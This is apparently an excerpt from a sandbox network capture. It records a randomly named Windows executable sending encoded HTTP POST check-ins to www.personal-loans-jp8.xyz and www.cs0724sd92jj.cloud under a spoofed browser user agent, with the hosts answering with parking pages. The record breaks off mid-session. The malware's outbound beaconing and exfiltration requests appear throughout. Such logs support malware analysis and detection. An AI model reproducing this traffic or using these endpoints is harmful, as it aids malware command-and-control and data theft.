Oct 9, 2024 16:28:46.779932976 CEST	1236	IN	Data Raw: 26 6e 62 73 70 3b d0 be d0 b1 d0 b5 d0 b7 d0 be d0 bf d0 b0 d1 81 d1 8c d1 82 d0 b5 20 d0 b2 d0 b0 d1 88 20 d0 bf d1 80 d0 be d0 b5 d0 ba d1 82 20 d0 be d1 82 26 6e 62 73 70 3b d0 b7 d0 bb d0 be d1 83 d0 bc d1 8b d1 88 d0 bb d0 b5 d0 bd d0 bd d0 Data Ascii:    ! ,
Oct 9, 2024 16:28:46.779946089 CEST	1236	IN	Data Raw: 20 20 20 73 63 72 69 70 74 2e 73 72 63 20 3d 20 27 68 74 74 70 73 3a 2f 2f 70 61 72 6b 69 6e 67 2e 72 65 67 2e 72 75 2f 73 63 72 69 70 74 2f 67 65 74 5f 64 6f 6d 61 69 6e 5f 64 61 74 61 3f 64 6f 6d 61 69 6e 5f 6e 61 6d 65 3d 77 77 77 2e 72 65 64 Data Ascii: script.src = 'https://parking.reg.ru/script/get_domain_data?domain_name=www.redimpact.online&rand=' + Math.random() + '&callback=ondata'; script.async = 1; head.appendChild( script );</script><script>if ( 'www.redimpact.onli
Oct 9, 2024 16:28:46.779958963 CEST	876	IN	Data Raw: 6f 6d 2f 67 74 61 67 2f 6a 73 3f 69 64 3d 55 41 2d 33 33 38 30 39 30 39 2d 32 35 22 3e 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 64 61 74 61 4c 61 79 65 72 20 3d 20 77 69 6e 64 6f 77 2e 64 61 74 61 4c 61 79 65 72 20 Data Ascii: om/gtag/js?id=UA-3380909-25"></script><script>window.dataLayer = window.dataLayer \|\| []; function gtag(){dataLayer.push(arguments);} gtag('js', new Date()); gtag('config', 'UA-3380909-25');</script>... Yandex.Metrika counter --><

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.5	49899	199.59.243.227	80	2276	C:\Program Files (x86)\zZQYKwZoIJescBlCRlSUyxyfHoyfMqXeCjHfNIoYERhtvimxAX\GxqFOvQfqyr.exe

Timestamp	Bytes transferred	Direction	Data
Oct 9, 2024 16:29:02.011399984 CEST	792	OUT	POST /slxf/ HTTP/1.1 Host: www.personal-loans-jp8.xyz Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.9 Accept-Encoding: gzip, deflate, br Origin: http://www.personal-loans-jp8.xyz Content-Length: 207 Connection: close Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://www.personal-loans-jp8.xyz/slxf/ User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.2.18) Gecko/20110628 Ubuntu/10.04 (lucid) Firefox/3.6.18 Data Raw: 31 44 64 30 41 5a 3d 42 5a 66 6c 2f 48 68 30 37 6c 4e 4c 51 4b 6e 67 41 38 58 59 33 4f 2f 41 61 71 78 70 4f 6f 6d 4c 50 43 6c 44 4d 45 2b 56 78 74 67 45 31 62 66 41 42 54 72 73 4d 69 6b 6d 79 50 6c 73 31 48 43 38 6c 63 34 30 35 74 67 2b 31 34 54 51 39 6c 2b 39 48 44 4a 33 4c 41 59 39 6f 5a 74 51 63 79 2f 7a 38 79 64 59 58 2f 64 4e 50 4f 6b 49 42 38 70 6e 68 45 67 61 43 6d 34 65 6f 48 56 4e 78 59 72 75 51 6a 54 6e 71 48 61 4f 57 33 59 30 56 6b 4c 37 57 70 41 7a 54 45 70 2b 79 6a 42 55 52 39 47 65 34 53 47 52 56 52 62 4e 62 4b 64 49 66 32 49 4d 6a 71 38 64 69 35 37 4c 6b 46 59 62 36 34 6e 77 34 43 6c 34 2b 51 30 3d Data Ascii: 1Dd0AZ=BZfl/Hh07lNLQKngA8XY3O/AaqxpOomLPClDME+VxtgE1bfABTrsMikmyPls1HC8lc405tg+14TQ9l+9HDJ3LAY9oZtQcy/z8ydYX/dNPOkIB8pnhEgaCm4eoHVNxYruQjTnqHaOW3Y0VkL7WpAzTEp+yjBUR9Ge4SGRVRbNbKdIf2IMjq8di57LkFYb64nw4Cl4+Q0=
Oct 9, 2024 16:29:02.460580111 CEST	1236	IN	HTTP/1.1 200 OK date: Wed, 09 Oct 2024 14:29:02 GMT content-type: text/html; charset=utf-8 content-length: 1154 x-request-id: 8a041b9a-83a8-4023-9232-30cd30ca5b98 cache-control: no-store, max-age=0 accept-ch: sec-ch-prefers-color-scheme critical-ch: sec-ch-prefers-color-scheme vary: sec-ch-prefers-color-scheme x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_MYkN7ATu9Syv+v73YZHp1vatytPR/rlkXlgN5w1iC7ghMIk+2fSwLn5wbQIci6y4KTGaXfK/XhNO0q50eRuNXA== set-cookie: parking_session=8a041b9a-83a8-4023-9232-30cd30ca5b98; expires=Wed, 09 Oct 2024 14:44:02 GMT; path=/ connection: close Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 4d 59 6b 4e 37 41 54 75 39 53 79 76 2b 76 37 33 59 5a 48 70 31 76 61 74 79 74 50 52 2f 72 6c 6b 58 6c 67 4e 35 77 31 69 43 37 67 68 4d 49 6b 2b 32 66 53 77 4c 6e 35 77 62 51 49 63 69 36 79 34 4b 54 47 61 58 66 4b 2f 58 68 4e 4f 30 71 35 30 65 52 75 4e 58 41 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED] Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_MYkN7ATu9Syv+v73YZHp1vatytPR/rlkXlgN5w1iC7ghMIk+2fSwLn5wbQIci6y4KTGaXfK/XhNO0q50eRuNXA==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
Oct 9, 2024 16:29:02.461174965 CEST	607	IN	Data Raw: 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiOGEwNDFiOWEtODNhOC00MDIzLTkyMzItMzBjZDMwY2E1Yjk4IiwicGFnZV90aW1lIjoxNzI4NDg0MT

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.5	49914	199.59.243.227	80	2276	C:\Program Files (x86)\zZQYKwZoIJescBlCRlSUyxyfHoyfMqXeCjHfNIoYERhtvimxAX\GxqFOvQfqyr.exe

Timestamp	Bytes transferred	Direction	Data
Oct 9, 2024 16:29:04.555932045 CEST	812	OUT	POST /slxf/ HTTP/1.1 Host: www.personal-loans-jp8.xyz Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.9 Accept-Encoding: gzip, deflate, br Origin: http://www.personal-loans-jp8.xyz Content-Length: 227 Connection: close Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://www.personal-loans-jp8.xyz/slxf/ User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.2.18) Gecko/20110628 Ubuntu/10.04 (lucid) Firefox/3.6.18 Data Raw: 31 44 64 30 41 5a 3d 42 5a 66 6c 2f 48 68 30 37 6c 4e 4c 51 71 33 67 54 50 76 59 78 75 2f 44 47 36 78 70 62 34 6e 43 50 43 68 44 4d 47 53 2f 78 65 49 45 31 36 76 41 41 53 72 73 50 69 6b 6d 6d 66 6c 6a 78 48 43 6a 6c 63 38 53 35 73 63 2b 31 34 58 51 39 6e 6d 39 48 51 52 32 45 77 59 7a 6e 35 74 53 59 79 2f 7a 38 79 64 59 58 2f 67 46 50 4e 55 49 42 4e 5a 6e 67 6c 67 62 42 6d 34 5a 68 6e 56 4e 36 34 72 51 51 6a 53 58 71 44 61 6b 57 30 67 30 56 68 33 37 58 39 55 77 5a 45 70 38 2f 44 41 45 57 6f 72 72 36 55 57 76 58 48 57 46 43 49 46 74 61 41 6c 6d 35 49 30 31 78 5a 58 7a 30 57 51 73 72 49 47 5a 69 68 31 49 67 48 68 6b 2f 38 51 44 35 52 42 75 4e 39 36 76 38 46 71 6e 2f 41 48 46 Data Ascii: 1Dd0AZ=BZfl/Hh07lNLQq3gTPvYxu/DG6xpb4nCPChDMGS/xeIE16vAASrsPikmmfljxHCjlc8S5sc+14XQ9nm9HQR2EwYzn5tSYy/z8ydYX/gFPNUIBNZnglgbBm4ZhnVN64rQQjSXqDakW0g0Vh37X9UwZEp8/DAEWorr6UWvXHWFCIFtaAlm5I01xZXz0WQsrIGZih1IgHhk/8QD5RBuN96v8Fqn/AHF
Oct 9, 2024 16:29:05.000648975 CEST	1236	IN	HTTP/1.1 200 OK date: Wed, 09 Oct 2024 14:29:04 GMT content-type: text/html; charset=utf-8 content-length: 1154 x-request-id: 83d91ec1-832d-4a04-a6b2-ad5915a9cef3 cache-control: no-store, max-age=0 accept-ch: sec-ch-prefers-color-scheme critical-ch: sec-ch-prefers-color-scheme vary: sec-ch-prefers-color-scheme x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_MYkN7ATu9Syv+v73YZHp1vatytPR/rlkXlgN5w1iC7ghMIk+2fSwLn5wbQIci6y4KTGaXfK/XhNO0q50eRuNXA== set-cookie: parking_session=83d91ec1-832d-4a04-a6b2-ad5915a9cef3; expires=Wed, 09 Oct 2024 14:44:04 GMT; path=/ connection: close Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 4d 59 6b 4e 37 41 54 75 39 53 79 76 2b 76 37 33 59 5a 48 70 31 76 61 74 79 74 50 52 2f 72 6c 6b 58 6c 67 4e 35 77 31 69 43 37 67 68 4d 49 6b 2b 32 66 53 77 4c 6e 35 77 62 51 49 63 69 36 79 34 4b 54 47 61 58 66 4b 2f 58 68 4e 4f 30 71 35 30 65 52 75 4e 58 41 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED] Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_MYkN7ATu9Syv+v73YZHp1vatytPR/rlkXlgN5w1iC7ghMIk+2fSwLn5wbQIci6y4KTGaXfK/XhNO0q50eRuNXA==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
Oct 9, 2024 16:29:05.000684023 CEST	607	IN	Data Raw: 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiODNkOTFlYzEtODMyZC00YTA0LWE2YjItYWQ1OTE1YTljZWYzIiwicGFnZV90aW1lIjoxNzI4NDg0MT

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.5	49927	199.59.243.227	80	2276	C:\Program Files (x86)\zZQYKwZoIJescBlCRlSUyxyfHoyfMqXeCjHfNIoYERhtvimxAX\GxqFOvQfqyr.exe

Timestamp	Bytes transferred	Direction	Data
Oct 9, 2024 16:29:07.102219105 CEST	1829	OUT	POST /slxf/ HTTP/1.1 Host: www.personal-loans-jp8.xyz Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.9 Accept-Encoding: gzip, deflate, br Origin: http://www.personal-loans-jp8.xyz Content-Length: 1243 Connection: close Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://www.personal-loans-jp8.xyz/slxf/ User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.2.18) Gecko/20110628 Ubuntu/10.04 (lucid) Firefox/3.6.18 Data Raw: 31 44 64 30 41 5a 3d 42 5a 66 6c 2f 48 68 30 37 6c 4e 4c 51 71 33 67 54 50 76 59 78 75 2f 44 47 36 78 70 62 34 6e 43 50 43 68 44 4d 47 53 2f 78 59 51 45 30 4d 37 41 42 78 44 73 4f 69 6b 6d 6c 66 6c 67 78 48 43 71 6c 61 55 65 35 73 51 45 31 36 2f 51 2f 43 79 39 54 78 52 32 66 67 59 7a 6c 35 74 54 63 79 2b 70 38 79 4e 63 58 2b 63 46 50 4e 55 49 42 4f 52 6e 6d 30 67 62 4e 47 34 65 6f 48 56 52 78 59 72 72 51 6a 4b 68 71 44 57 65 57 46 41 30 55 41 48 37 62 6f 41 77 52 45 70 36 38 44 42 42 57 6f 76 43 36 51 50 63 58 48 4b 76 43 4b 56 74 5a 45 31 34 6a 4c 38 39 79 76 50 69 37 57 6f 7a 79 4e 79 45 67 53 42 76 6b 58 42 47 38 2f 38 58 34 46 70 4c 50 35 6e 36 69 44 47 71 39 31 61 4a 4b 73 65 4c 6f 43 73 4b 2b 33 39 49 49 6a 37 69 30 30 41 37 30 54 32 78 48 4e 67 4b 53 54 62 4a 37 53 53 54 4e 34 79 65 65 7a 50 33 77 6e 56 6d 6a 36 51 2f 6c 30 31 76 51 4c 78 61 78 32 64 63 75 78 32 2f 76 55 42 6e 73 76 32 73 4a 47 62 66 67 68 79 67 35 52 66 53 49 33 2b 33 4f 64 4a 62 57 48 46 6d 53 32 61 62 41 42 58 34 78 69 63 [TRUNCATED] Data Ascii: 1Dd0AZ=BZfl/Hh07lNLQq3gTPvYxu/DG6xpb4nCPChDMGS/xYQE0M7ABxDsOikmlflgxHCqlaUe5sQE16/Q/Cy9TxR2fgYzl5tTcy+p8yNcX+cFPNUIBORnm0gbNG4eoHVRxYrrQjKhqDWeWFA0UAH7boAwREp68DBBWovC6QPcXHKvCKVtZE14jL89yvPi7WozyNyEgSBvkXBG8/8X4FpLP5n6iDGq91aJKseLoCsK+39IIj7i00A70T2xHNgKSTbJ7SSTN4yeezP3wnVmj6Q/l01vQLxax2dcux2/vUBnsv2sJGbfghyg5RfSI3+3OdJbWHFmS2abABX4xicccHhQDiECXHXzrmrH0FQCY15KRB+Fug/V3s3MAmp1m7MSGkqSxcwSc5T6+KZm/glw8Tto6Z9tL5it5Ip7yNppIBTwLqqD0YmuMdLhvlkkK/OIS9ika0xBnl9HYLJwgKIOVwuTKBzcF72V5ylAyu3mQjMagBntkLSUsH8wuaIMDo3yuh4CF8Gokxyt4DfZZ6YutOgODPS+MIA6z9kdzq4tzJvdjS1Y96dQ4mBEWfnvIKrXdst83OxnLG1hm+mM3ffu4KsweQx7G1A3AomtWOkPdW55w2NI0D0BI29Kmae9yQgC3RiCqe+kog+2A07MsmWDYpC62tOEirga6yycHNJr4tZZgHeI4H82jni3d93vMdlcvSSXtB/CbD43bb/wPFv+cJhySjTXRvvD41oSU34U1QzYGCcUhNB3MvQ5Ylz7HXLge1+PsAtC4l4zDIbhHRXp/LY3DIbC9oUpiLeFN/vD20CHlylaOzsBIaEvmsnsJA4DeZa0VBuYYoQWGYwDMEqKpQPCEoB7sjvGjG6bUW4hIzxPu9nt52tOdQ8D+nV7o3dpR6/hJMCvwPnOqUiAFlG6zhiZ2mwcd+mlIRRy2k667fTwlCl8YfoJMEOhp1lpLqqZNNwrxPn7w8VzMYQOd8Ybk3h9bK8QyFYzEhW6xKVW+4JPi98dFPypa [TRUNCATED]
Oct 9, 2024 16:29:07.549146891 CEST	1236	IN	HTTP/1.1 200 OK date: Wed, 09 Oct 2024 14:29:06 GMT content-type: text/html; charset=utf-8 content-length: 1154 x-request-id: 3748a644-71ee-4cc1-850d-a303fe818bd2 cache-control: no-store, max-age=0 accept-ch: sec-ch-prefers-color-scheme critical-ch: sec-ch-prefers-color-scheme vary: sec-ch-prefers-color-scheme x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_MYkN7ATu9Syv+v73YZHp1vatytPR/rlkXlgN5w1iC7ghMIk+2fSwLn5wbQIci6y4KTGaXfK/XhNO0q50eRuNXA== set-cookie: parking_session=3748a644-71ee-4cc1-850d-a303fe818bd2; expires=Wed, 09 Oct 2024 14:44:07 GMT; path=/ connection: close Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 4d 59 6b 4e 37 41 54 75 39 53 79 76 2b 76 37 33 59 5a 48 70 31 76 61 74 79 74 50 52 2f 72 6c 6b 58 6c 67 4e 35 77 31 69 43 37 67 68 4d 49 6b 2b 32 66 53 77 4c 6e 35 77 62 51 49 63 69 36 79 34 4b 54 47 61 58 66 4b 2f 58 68 4e 4f 30 71 35 30 65 52 75 4e 58 41 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED] Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_MYkN7ATu9Syv+v73YZHp1vatytPR/rlkXlgN5w1iC7ghMIk+2fSwLn5wbQIci6y4KTGaXfK/XhNO0q50eRuNXA==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
Oct 9, 2024 16:29:07.549288034 CEST	607	IN	Data Raw: 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiMzc0OGE2NDQtNzFlZS00Y2MxLTg1MGQtYTMwM2ZlODE4YmQyIiwicGFnZV90aW1lIjoxNzI4NDg0MT

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.5	49940	199.59.243.227	80	2276	C:\Program Files (x86)\zZQYKwZoIJescBlCRlSUyxyfHoyfMqXeCjHfNIoYERhtvimxAX\GxqFOvQfqyr.exe

Timestamp	Bytes transferred	Direction	Data
Oct 9, 2024 16:29:09.645126104 CEST	512	OUT	GET /slxf/?1Dd0AZ=Mb3F8yBS6AlbUJPyZs3X69r2DqN8IvT5IyZZHGmk1vQlgc6dIBTXJS0PrtljhQmz1YN0gN0Ls4vblXiCECQJAAozx7p4dDONpSd/YuBCScUyPep9ny5nGU0OrFlk67uJPQ==&-n1P=0hFdS6 HTTP/1.1 Host: www.personal-loans-jp8.xyz Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.9 Connection: close User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.2.18) Gecko/20110628 Ubuntu/10.04 (lucid) Firefox/3.6.18
Oct 9, 2024 16:29:10.253796101 CEST	1236	IN	HTTP/1.1 200 OK date: Wed, 09 Oct 2024 14:29:09 GMT content-type: text/html; charset=utf-8 content-length: 1510 x-request-id: 7bb1a2d2-5d19-4730-9c3c-6d5cf22f8a1e cache-control: no-store, max-age=0 accept-ch: sec-ch-prefers-color-scheme critical-ch: sec-ch-prefers-color-scheme vary: sec-ch-prefers-color-scheme x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_qngGQ6vsEmPUKEbDgaMdoCyGHTIEIEUBFff6VM6V1TDHtSmmaGyeTGsW6xT7cBpSZ0xAaeuUiGlTl7yYyBVuHQ== set-cookie: parking_session=7bb1a2d2-5d19-4730-9c3c-6d5cf22f8a1e; expires=Wed, 09 Oct 2024 14:44:10 GMT; path=/ connection: close Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 71 6e 67 47 51 36 76 73 45 6d 50 55 4b 45 62 44 67 61 4d 64 6f 43 79 47 48 54 49 45 49 45 55 42 46 66 66 36 56 4d 36 56 31 54 44 48 74 53 6d 6d 61 47 79 65 54 47 73 57 36 78 54 37 63 42 70 53 5a 30 78 41 61 65 75 55 69 47 6c 54 6c 37 79 59 79 42 56 75 48 51 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED] Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_qngGQ6vsEmPUKEbDgaMdoCyGHTIEIEUBFff6VM6V1TDHtSmmaGyeTGsW6xT7cBpSZ0xAaeuUiGlTl7yYyBVuHQ==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
Oct 9, 2024 16:29:10.254401922 CEST	963	IN	Data Raw: 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiN2JiMWEyZDItNWQxOS00NzMwLTljM2MtNmQ1Y2YyMmY4YTFlIiwicGFnZV90aW1lIjoxNzI4NDg0MT

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.5	49987	119.28.49.194	80	2276	C:\Program Files (x86)\zZQYKwZoIJescBlCRlSUyxyfHoyfMqXeCjHfNIoYERhtvimxAX\GxqFOvQfqyr.exe

Timestamp	Bytes transferred	Direction	Data
Oct 9, 2024 16:29:24.438149929 CEST	780	OUT	POST /tma8/ HTTP/1.1 Host: www.cs0724sd92jj.cloud Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.9 Accept-Encoding: gzip, deflate, br Origin: http://www.cs0724sd92jj.cloud Content-Length: 207 Connection: close Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://www.cs0724sd92jj.cloud/tma8/ User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.2.18) Gecko/20110628 Ubuntu/10.04 (lucid) Firefox/3.6.18 Data Raw: 31 44 64 30 41 5a 3d 77 4a 76 66 75 51 68 6d 62 35 65 63 75 4e 7a 65 56 48 52 4d 70 39 4e 6d 49 6d 74 31 59 48 55 73 56 6d 41 35 2f 79 53 52 79 58 76 37 77 36 41 51 51 41 58 61 4b 33 64 76 74 78 57 74 6f 63 6d 6e 74 35 4e 47 32 44 4c 54 2b 6f 58 70 6e 42 49 52 44 54 73 